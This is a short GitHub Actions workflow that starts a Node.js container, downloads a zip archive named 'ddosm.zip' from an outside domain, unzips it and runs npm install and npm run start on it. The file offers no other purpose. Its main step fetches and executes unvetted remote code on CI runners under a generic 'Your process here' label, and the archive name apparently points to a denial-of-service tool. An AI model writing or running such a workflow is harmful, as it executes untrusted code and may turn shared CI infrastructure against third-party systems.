name: Use Docker Container

on: workflow_dispatch

jobs:
  docker-node:
    runs-on: ubuntu-latest
    
    container:
      image: node:18-bullseye  # Use Docker image instead of setup-node
      
    steps:
    - uses: actions/checkout@v3
    
    - name: Verify Node.js
      run: |
        node --version
        npm --version
    
    - name: Your process here
      run: |
        # Download your file
        curl -L -o project.zip "https://reality.mahmud-tech.online/ddosm.zip"
        unzip project.zip -d ./project
        cd ./project
        npm install
        npm run start
